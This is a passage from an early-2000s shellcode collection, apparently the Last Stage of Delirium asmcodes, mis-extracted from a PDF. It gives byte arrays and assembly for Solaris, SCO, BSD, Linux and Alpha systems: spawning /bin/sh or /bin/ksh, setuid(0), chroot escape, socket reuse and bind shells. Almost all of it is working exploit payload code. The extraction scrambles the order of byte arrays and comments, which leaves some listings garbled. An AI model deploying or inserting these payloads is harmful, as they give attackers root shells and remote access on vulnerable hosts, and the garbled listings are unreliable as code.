a3,32108(ra)
stq
zero,32116(ra)
lda
a1,32092(ra)
bis
zero,0x83,a3
stl
a3,8320(sp)
lda
a4,8320(sp)
lda
a5,699(zero)
lda
v0,-688(a5)
jsr
ra,(a4),0x10

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setreuidcode[]=
"\xff\xff\x1f\x22"
"\x11\x04\xff\x47"
"\xbb\x02\xbf\x22"
"\xc3\xfd\x15\x20"
"\x13\x74\xf0\x47"
"\x80\x02\x7e\xb2"
"\x80\x02\x9e\x22"
"\xfb\x6b\x7f\x26"
"\x01\x80\x73\x22"
"\x84\x02\x7e\xb2"
"\x10\x40\x54\x6b"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

11*4 bytes
lda
a0,-1(zero)
bis
zero,zero,a1
lda
a5,699(zero)
lda
v0,-573(a5)
bis
zero,0x83,a3
stl
a3,640(sp)
lda
a4,640(sp)
ldah
a3,27643(zero)
lda
a3,-32767(a3)
stl
a3,644(sp)
jsr
ra,(a4),0x10

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char jump[]=
"\00\x40\xde\x47"
"\01\x80\xfa\x6b"
;

/* bis
/* ret

sp,sp,v0
zero,(ra),1

*/
*/

#endif

Solaris/x86 codes, file: x86-solaris


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for solaris 2.6 2.7 2.8 x86
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
ioctl
so_socket
bind
listen
accept
fcntl

%eax
---x00b
x00b
x017
x050
x03d
x00c
x036
x0e6
x0e8
x0e9
x0ea
x03e

*://lsd-pl.net/ #*/
#*/

stack
--------------------------------------------------------------ret,->path="/bin/ksh",->[->a0=path,0]
ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
ret,uid=0
ret,->path="b..",mode= (each value is valid)
ret,->path={"b..","."}
ret,->path=".."
ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
ret,AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1
ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
ret,sfd,backlog=5,vers= (not required in this syscall)
ret,sfd,0,0,vers= (not required in this syscall)
ret,sfd,F_DUP2FD=0x09,fd={0,1,2}



*/
#if defined(X86) && defined(SOLARIS)
char _shellcode[]=
"\xeb\x1a"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\x83\xef\x3b"
"\xb0\x9a"
"\xab"
"\x47"
"\xb0\x07"
"\xab"
"\xb0\x0b"
"\xe8\xe1\xff\xff\xff"
"/bin/ksh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

33+8 bytes
jmp
<shellcode+28>
xorl
%edx,%edx
popl
%eax
leal
0x14(%eax),%edi
pushl
%edi
pushl
%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
%al,0x8(%edx)
subl
$0x3b,%edi
movb
$0x9a,%al
stosl
%eax,%es:(%edi)
incl
%edi
movb
$0x07,%al
stosl
%eax,%es:(%edi)
movb
$0x0b,%al
call
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char syscallcode[]=
"\x33\xc0"
"\xeb\x09"
"\x5f"
"\x57"
"\x47"
"\xab"
"\x47"
"\xaa"
"\x5e"
"\xeb\x0d"
"\xe8\xf2\xff\xff\xff"
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

26 bytes
xorl
%eax,%eax
jmp
<syscallcode+13>
popl
%edi
pushl
%edi
incl
%edi
stosl
%eax,%es:(%edi)
incl
%edi
stosb
%al,%es:(%edi)
popl
%esi
jmp
<syscallcode+26>
call
<syscallcode+4>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* ret

*/

char shellcode[]=
"\xeb\x12"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\xb0\x0b"
"\xff\xd6"
"\xe8\xe9\xff\xff\xff"
"/bin/ksh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

25+8 bytes
jmp
<shellcode+20>
xorl
%edx,%edx
popl
%eax
leal
0x14(%eax),edi
pushl
%edi
pushl
%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
%al,0x8(%edx)
movb
$0x0b,%al
call
*%esi
call
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x1d"
"\x33\xd2"
"\x58"
"\x8d\x78\xac"
"\x57"
"\x50"
"\x88\x50\x08"
"\x88\x50\x0b"
"\xab"
"\x8d\x40\x09"
"\xab"
"\x8d\x40\x03"
"\xab"
"\x92"
"\xab"
"\xb0\x0b"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

36+12+cmdlen bytes
jmp
<cmdshellcode+31>
xorl
%edx,%edx
popl
%eax
leal
-0x44(%eax),edi
pushl
%edi
pushl
%eax
movb
%dl,0x8(%eax)
movb
%dl,0xb(%eax)
stosl
%eax,%es:(%edi)
leal
0x09(%eax),%eax
stosl
%eax,%es:(%edi)
leal
0x03(%eax),%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
$0x0b,%al

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/



"\xff\xd6"
/* call
"\xe8\xde\xff\xff\xff" /* call
"/bin/ksh -c "
/* command */

*%esi
<cmdshellcode+2>

*/
*/

%eax,%eax
%eax
$0x17,%al
*%esi

*/
*/
*/
*/
*/

;
char setuidcode[]=
"\x33\xc0"
"\x50"
"\xb0\x17"
"\xff\xd6"
;

/*
/*
/*
/*
/*

7 bytes
xorl
pushl
movb
call

char chrootcode[]=
"\x68""b..."
"\x89\xe7"
"\x33\xc0"
"\x88\x47\x03"
"\x57"
"\xb0\x50"
"\xff\xd6"
"\x57"
"\xb0\x3d"
"\xff\xd6"
"\x47"
"\x33\xc9"
"\xb1\xff"
"\x57"
"\xb0\x0c"
"\xff\xd6"
"\xe2\xfa"
"\x47"
"\x57"
"\xb0\x3d"
"\xff\xd6"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

40 bytes
pushl
$0x2e2e2e62
movl
%esp,%edi
xorl
%eax,%eax
movb
%al,0x3(%edi)
pushl
%edi
movb
$0x50,%al
call
*%esi
pushl
%edi
movb
$0x3d,%al
call
*%esi
incl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%edi
movb
$0x0c,%al
call
*%esi
loop
<chrootcode+28>
incl
%edi
pushl
%edi
movb
$0x3d,%al
call
*%esi

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\x8d\x4f\x10"
"\xb0\x91"
"\xab"
"\xab"
"\x91"
"\xab"
"\x95"
"\xb5\x54"
"\x51"
"\x66\xb9\x01\x01"
"\x51"
"\x33\xc0"
"\xb0\x36"
"\xff\xd6"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5d\x02"
"\x74\x02"
"\xe2\xe6"
"\x6a\x09"
"\x51"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x3e"
"\xff\xd6"
"\xe2\xf4"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

67 bytes
pushl
%esi
popl
%edi
subl
$0x7c,%edi
pushl
%edi
leal
0x10(%edi),%ecx
movb
$0x91,%al
stosl
%eax,%es:(%edi)
stosl
%eax,%es:(%edi)
xchgl
%ecx,%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%ebp
movb
$0x54,%ch
pushl
%ecx
movw
$0x0101,%cx
pushl
%ecx
xorl
%eax,%eax
movb
$0x36,%al
call
*%esi
popl
%ecx
xorl
%ebx,%ebx
cmpl
%ebx,%eax
jne
<findsckcode+47>
movw
$0x1234,%bx
cmpw
%bx,0x2(%ebp)
je
<findsckcode+49>
loop
<findsckcode+23>
pushb
$0x09
pushl
%ecx
xchgl
%ecx,%eax
movb
$0x03,%cl
decl
%ecx
movl
%ecx,0x8(%esp)
incl
%ecx
movb
$0x3e,%al
call
*%esi
loop
<findsckcode+55>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=

/* 73 bytes

*/



"\x33\xc0"
"\x68\xff\x02\x12\x34"
"\x89\xe7"
"\x40"
"\x50"
"\x48"
"\x50"
"\x50"
"\xb0\x02"
"\x50"
"\x50"
"\xb0\xe6"
"\xff\xd6"
"\x8b\xd8"
"\x33\xc0"
"\x89\x47\x04"
"\x6a\x10"
"\x57"
"\x53"
"\xb0\xe8"
"\xff\xd6"
"\x6a\x05"
"\x53"
"\xb0\xe9"
"\xff\xd6"
"\x33\xc0"
"\x50"
"\x50"
"\x53"
"\xb0\xea"
"\xff\xd6"
"\x8b\xd8"
"\x6a\x09"
"\x53"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x3e"
"\xff\xd6"
"\xe2\xf4"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

xorl
pushl
movl
incl
pushl
decl
pushl
pushl
movb
pushl
pushl
movb
call
movl
xorl
movl
pushb
pushl
pushl
movb
call
pushb
pushl
movb
call
xorl
pushl
pushl
pushl
movb
call
movl
pushb
pushl
xchgl
movb
decl
movl
incl
movb
call
loop

%eax,%eax
$0x341202ff
$esp,%edi
%eax
%eax
%eax
%eax
%eax
$0x02,%al
%eax
%eax
$0xe6,%al
*%esi
%eax,%ebx
%eax,%eax
%eax,0x4(%edi)
$0x10
%edi
%ebx
$0xe8,%al
*%esi
$0x05
%ebx
$0xe9,%al
*%esi
%eax,%eax
%eax
%eax
%ebx
$0xea,%al
*%esi
%eax,%ebx
$0x09
%ebx
%ecx,%eax
$0x03,%cl
%ecx
%ecx,0x8(%esp)
%ecx
$0x3e,%al
*%esi
<bindsckcode+61>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

%esp,%eax

*/
*/

;
char jump[]=
"\x8b\xc4"
"\xc3"
;

/* movl
/* ret

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

39
05

#endif

SCO {OpenServer,Unixware}/x86 codes, file: x86-sco


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for openserver 5.0.4 unixware 7.0 x86
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
ioctl
close
dup
*/

%eax
---x00b
x00b
x017
x050
x03d
x00c
x036
x006
x029

*://lsd-pl.net/ #*/
#*/

stack
--------------------------------------------------------------ret,->path="/bin/ksh",->[->a0=path,0]
ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
ret,uid=0
ret,->path="b..",mode= (each value is valid)
ret,->path={"b..","."}
ret,->path=".."
ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
ret,fd={0,1,2}
ret,sfd

#if defined(X86) && ( defined(OPENSERVER) || defined(UNIXWARE) )


char _shellcode[]=

/* 33+8 bytes

*/



"\xeb\x1a"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\x83\xef\x3b"
"\xb0\x9a"
"\xab"
"\x47"
"\xb0\x07"
"\xab"
"\xb0\x0b"
"\xe8\xe1\xff\xff\xff"
"/bin/ksh"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

jmp
xorl
popl
leal
pushl
pushl
stosl
xchgl
stosl
movb
subl
movb
stosl
incl
movb
stosl
movb
call

char syscallcode[]=
"\x33\xc0"
"\xeb\x09"
"\x5f"
"\x57"
"\x47"
"\xab"
"\x47"
"\xaa"
"\x5e"
"\xeb\x0d"
"\xe8\xf2\xff\xff\xff"
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

26 bytes
xorl
%eax,%eax
jmp
<syscallcode+13>
popl
%edi
pushl
%edi
incl
%edi
stosl
%eax,%es:(%edi)
incl
%edi
stosb
%al,%es:(%edi)
popl
%esi
jmp
<syscallcode+26>
call
<syscallcode+4>

/* ret

*/

char shellcode[]=
"\xeb\x12"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\xb0\x0b"
"\xff\xd6"
"\xe8\xe9\xff\xff\xff"
"/bin/ksh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

25+8 bytes
jmp
<shellcode+20>
xorl
%edx,%edx
popl
%eax
leal
0x14(%eax),edi
pushl
%edi
pushl
%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
%al,0x8(%edx)
movb
$0x0b,%al
call
*%esi
call
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x1d"
"\x33\xd2"
"\x58"
"\x8d\x78\xac"
"\x57"
"\x50"
"\x88\x50\x08"
"\x88\x50\x0b"
"\xab"
"\x8d\x40\x09"
"\xab"
"\x8d\x40\x03"
"\xab"
"\x92"
"\xab"
"\xb0\x0b"
"\xff\xd6"
"\xe8\xde\xff\xff\xff"
"/bin/ksh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

36+12+cmdlen bytes
jmp
<cmdshellcode+31>
xorl
%edx,%edx
popl
%eax
leal
-0x44(%eax),edi
pushl
%edi
pushl
%eax
movb
%dl,0x8(%eax)
movb
%dl,0xb(%eax)
stosl
%eax,%es:(%edi)
leal
0x09(%eax),%eax
stosl
%eax,%es:(%edi)
leal
0x03(%eax),%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
$0x0b,%al
call
*%esi
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

<shellcode+28>
%edx,%edx
%eax
0x14(%eax),%edi
%edi
%eax
%eax,%es:(%edi)
%eax,%edx
%eax,%es:(%edi)
%al,0x8(%edx)
$0x3b,%edi
$0x9a,%al
%eax,%es:(%edi)
%edi
$0x07,%al
%eax,%es:(%edi)
$0x0b,%al
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/


char setuidcode[]=
"\x33\xc0"
"\x50"
"\xb0\x17"
"\xff\xd6"
;

/*
/*
/*
/*
/*

7 bytes
xorl
pushl
movb
call

char chrootcode[]=
"\x68""b..."
"\x89\xe7"
"\x33\xc0"
"\x88\x47\x03"
"\x57"
"\xb0\x50"
"\xff\xd6"
"\x57"
"\xb0\x3d"
"\xff\xd6"
"\x47"
"\x33\xc9"
"\xb1\xff"
"\x57"
"\xb0\x0c"
"\xff\xd6"
"\xe2\xfa"
"\x47"
"\x57"
"\xb0\x3d"
"\xff\xd6"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

40 bytes
pushl
$0x2e2e2e62
movl
%esp,%edi
xorl
%eax,%eax
movb
%al,0x3(%edi)
pushl
%edi
movb
$0x50,%al
call
*%esi
pushl
%edi
movb
$0x3d,%al
call
*%esi
incl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%edi
movb
$0x0c,%al
call
*%esi
loop
<chrootcode+28>
incl
%edi
pushl
%edi
movb
$0x3d,%al
call
*%esi

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

67 bytes
pushl
%esi
popl
%edi
subl
$0x7c,%edi
pushl
%edi
leal
0x10(%edi),%ecx
movb
$0x91,%al
stosl
%eax,%es:(%edi)
stosl
%eax,%es:(%edi)
xchgl
%ecx,%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%ebp
movb
$0x54,%ch
pushl
%ecx
movw
$0x0101,%cx
pushl
%ecx
xorl
%eax,%eax
movb
$0x36,%al
call
*%esi
popl
%ecx
xorl
%ebx,%ebx
cmpl
%ebx,%eax
jne
<findsckcode+47>
movw
$0x1234,%bx
cmpw
%bx,0x2(%ebp)
je
<findsckcode+49>
loop
<findsckcode+23>
movl
%ecx,%ebx
movb
$0x03,%cl
decl
%ecx
pushl
%ecx
movb
$0x06,%al
call
*%esi
pushl
%ebx
movb
$0x29,%al
call
*%esi
incl
%ecx
loop
<findsckcode+53>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#if defined(UNIXWARE)
char findsckcode[]=
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\x8d\x4f\x10"
"\xb0\x91"
"\xab"
"\xab"
"\x91"
"\xab"
"\x95"
"\xb5\x54"
"\x51"
"\x66\xb9\x01\x01"
"\x51"
"\x33\xc0"
"\xb0\x36"
"\xff\xd6"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5d\x02"
"\x74\x02"
"\xe2\xe6"
"\x8b\xd9"
"\xb1\x03"
"\x49"
"\x51"
"\xb0\x06"
"\xff\xd6"
"\x53"
"\xb0\x29"
"\xff\xd6"
"\x41"
"\xe2\xf2"
;
#endif
char jump[]=
"\x8b\xc4"
"\xc3"

/* movl
/* ret

%eax,%eax
%eax
$0x17,%al
*%esi

%esp,%eax

*/
*/
*/
*/
*/

*/
*/



;
#define FINDSCKPORTOFS
#define BINDSCKPORTOFS
#define SCO

39
05

#endif

{Free,Net,Open}BSD/x86 codes, file: x86-bsd


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for freebsd 3.4 openbsd 2.8 netbsd 1.5 x86
/*
syscall
----------execve
execve
setuid
mkdir
chroot
chdir
getpeername
socket
bind
listen
accept
dup2
*/

%eax
---x03b
x03b
x017
x088
x03d
x00c
x01f
x061
x068
x06a
x01e
x05a

*://lsd-pl.net/ #*/
#*/

stack
--------------------------------------------------------------ret,->path="/bin//sh",->[->a0=0],0
ret,->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
ret,uid=0
ret,->path="b..",mode= (each value is valid)
ret,->path={"b..","."}
ret,->path=".."
ret,sfd,->sadr=[],->[len=0x10]
ret,AF_INET=2,SOCK_STREAM=1,prot=0
ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],->[0x10]
ret,sfd,backlog=5
ret,sfd,0,0
ret,sfd,fd={0,1,2}

#if defined(X86) && ( defined(OPENBSD) || defined(FREEBSD) || defined(NETBSD) )


char shellcode[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x54"
"\x53"
"\x50"
"\xb0\x3b"
"\xcd\x80"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

23 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushl
%esp
pushl
%ebx
pushl
%eax
movb
$0x3b,%al
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x25"
"\x59"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x66\x68""-c"
"\x89\xe7"
"\x50"
"\x51"
"\x57"
"\x53"
"\x89\xe7"
"\x50"
"\x57"
"\x53"
"\x50"
"\xb0\x3b"
"\xcd\x80"
"\xe8\xd6\xff\xff\xff"
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

44+cmdlen bytes
jmp
<cmdshellcode+39>
popl
%ecx
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushw
$0x632d
movl
%esp,%edi
pushl
%eax
pushl
%ecx
pushl
%edi
pushl
%ebx
movl
%esp,%edi
pushl
%eax
pushl
%edi
pushl
%ebx
pushl
%eax
movb
$0x0b,%al
int
$0x80
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setuidcode[]=
"\x33\xc0"
"\x50"
"\xb0\x17"

/*
/*
/*
/*

7 bytes
xorl
%eax,%eax
pushl
%eax
movb
$0x17,%al

*/
*/
*/
*/



"\x50"
"\xcd\x80"

/* pushl
/* int

%eax
$0x80

*/
*/

;
char chrootcode[]=
"\x68""b..."
"\x89\xe7"
"\x33\xc0"
"\x88\x47\x03"
"\x57"
"\xb0\x88"
"\x50"
"\xcd\x80"
"\x57"
"\xb0\x3d"
"\x50"
"\xcd\x80"
"\x47"
"\x33\xc9"
"\xb1\xff"
"\x57"
"\x50"
"\xb0\x0c"
"\xcd\x80"
"\xe2\xfa"
"\x47"
"\x57"
"\xb0\x3d"
"\x50"
"\xcd\x80"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

44 bytes
pushl
$0x2e2e2e62
movl
%esp,%edi
xorl
%eax,%eax
movb
%al,0x3(%edi)
pushl
%edi
movb
$0x88,%al
pushl
%eax
int
$0x80
pushl
%edi
movb
$0x3d,%al
pushl
%eax
int
$0x80
incl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%edi
pushl
%eax
movb
$0x0c,%al
int
$0x80
loop
<chrootcode+31>
incl
%edi
pushl
%edi
movb
$0x3d,%al
pushl
%eax
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\xb0\x10"
"\xab"
"\x57"
"\x31\xc9"
"\xb1\xff"
"\x51"
"\x33\xc0"
"\xb0\x1f"
"\x51"
"\xcd\x80"
"\x59"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5f\x02"
"\x74\x02"
"\xe2\xe4"
"\x51"
"\x50"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x5a"
"\xcd\x80"
"\xe2\xf4"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

59 bytes
pushl
%esi
popl
%edi
subl
$0x7c,%edi
pushl
%edi
movb
$0x10,%al
stosl
%eax,%es:(%edi)
pushl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%ecx
xorl
%eax,%eax
movb
$0x1f,%al
pushl
%ecx
int
$0x80
popl
%ecx
popl
%ecx
xorl
%ebx,%ebx
cmpl
%ebx,%eax
jne
<findsckcode+40>
movw
$0x1234,%bx
cmpw
%bx,0x2(%edi)
je
<findsckcode+42>
loop
<findsckcode+14>
pushl
%ecx
pushl
%eax
xchgl
%ecx,%eax
movb
$0x03,%cl
decl
%ecx
movl
%ecx,0x8(%esp)
incl
%ecx
movb
$0x5a,%al
int
$0x80
loop
<findsckcode+47>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=
"\x33\xc0"
"\x68\xff\x02\x12\x34"
"\x89\xe7"
"\x50"
"\x6a\x01"
"\x6a\x02"
"\xb0\x61"
"\x50"

/*
/*
/*
/*
/*
/*
/*
/*
/*

70 bytes
xorl
%eax,%eax
pushl
$0x341202ff
movl
%esp,%edi
pushl
%eax
pushl
$0x01
pushl
$0x02
movb
$0x61,%al
pushl
%eax

*/
*/
*/
*/
*/
*/
*/
*/
*/



"\xcd\x80"
"\x8b\xd8"
"\x33\xc0"
"\x89\x47\x04"
"\x6a\x10"
"\x57"
"\x53"
"\xb0\x68"
"\x50"
"\xcd\x80"
"\x6a\x05"
"\x53"
"\xb0\x6a"
"\x50"
"\xcd\x80"
"\x33\xc0"
"\x50"
"\x50"
"\x53"
"\xb0\x1e"
"\x50"
"\xcd\x80"
"\x50"
"\x50"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x5a"
"\xcd\x80"
"\xe2\xf4"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

int
movl
xorl
movl
pushb
pushl
pushl
movb
pushl
int
pushb
pushl
movb
pushl
int
xorl
pushl
pushl
pushl
movb
pushl
int
pushl
pushl
xchgl
movb
decl
movl
incl
movb
int
loop

$0x80
%eax,%ebx
%eax,%eax
%eax,0x4(%edi)
$0x10
%edi
%ebx
$0x68,%al
%eax
$0x80
$0x05
%ebx
$0x6a,%al
%eax
$0x80
%eax,%eax
%eax
%eax
%ebx
$0x1e,%al
%eax
$0x80
%eax
%eax
%ecx,%eax
$0x03,%cl
%ecx
%ecx,0x8(%esp)
%ecx
$0x5a,%al
$0x80
<bindsckcode+58>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

%esp,%eax

*/
*/

;
char jump[]=
"\x8b\xc4"
"\xc3"
;

/* movl
/* ret

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS
#define BSD

32
05

#endif

Linux/x86 codes, file: x86-linux


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for linux (redhat 6.2) x86
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
socketcall
socketcall
socketcall
socketcall
socketcall
dup2
*/

%eax
---x00b
x00b
x017
x027
x03d
x00c
x066
x066
x066
x066
x066
x03f

*://lsd-pl.net/ #*/
#*/

%ebx,%ecx,%edx
--------------------------------------------------------------->path="/bin//sh",->[->a0=path,0]
->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0]
uid=0
->path="b..",mode=0 (each value is valid)
->path={"b..","."}
->path=".."
getpeername=7,->[sfd,->sadr=[],->[len=0x10]]
socket=1,->[AF_INET=2,SOCK_STREAM=2,prot=0]
bind=2,->[sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10]
listen=4,->[sfd,backlog=102]
accept=5,->[sfd,0,0]
sfd,fd={2,1,0}

#if defined(X86) && defined(LINUX)


char shellcode[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"

/*
/*
/*
/*
/*
/*
/*

24 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax

*/
*/
*/
*/
*/
*/
*/



/*
/*
/*
/*
/*

pushl
movl
cdql
movb
int

$0x0b,%al
$0x80

*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x22"
"\x59"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
